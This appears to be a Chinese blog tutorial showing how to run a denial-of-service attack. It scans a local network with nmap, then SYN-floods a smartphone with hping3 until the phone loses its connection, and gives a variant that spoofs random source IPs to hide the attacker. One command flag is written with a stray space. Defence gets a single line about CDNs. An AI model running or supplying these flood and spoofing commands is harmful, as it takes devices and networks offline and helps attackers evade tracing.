攻击过程:

    1. 你使用hping3执行拒绝服务攻击(即DoS)。
    1. 你隐藏你的a$$(我是指你的源头IP地址)。
    1. 你的目标机器看到的将是随机性源头IP地址中的源头,而不是你的IP地址(IP伪装)。
    1. 你的目标机器会在5分钟里面不堪重负,停止响应。

ok,我们进行简单的模拟攻击:

先用nmap扫描内网存活主机

nmap -sP 192.168.1.1/24

18-03-42-6631697785862989904.png

我们的攻击目标是智能手机。

输入命令hping -S --flood -V IP 开始攻击
18-04-52-6631811035560657453.png

我们来看看攻击的效果

18-05-39-6631645009304857142.png

ok 这时候 手机已经呈现断网状态

按下ctrl+c关闭,这时候我们看看发送了多少数据
18-06-17-6631726373165296369.png

这个数据包很客观的了。

另外就是隐藏IP攻击目标

命令是这样的:

hping3 -S -U --flood -V --rand -source IP

怎样防止DOS攻击

如果是网站,可以让网站接入CDN加速。

Last modification:February 21st, 2019 at 03:25 pm
正在沿街乞讨中……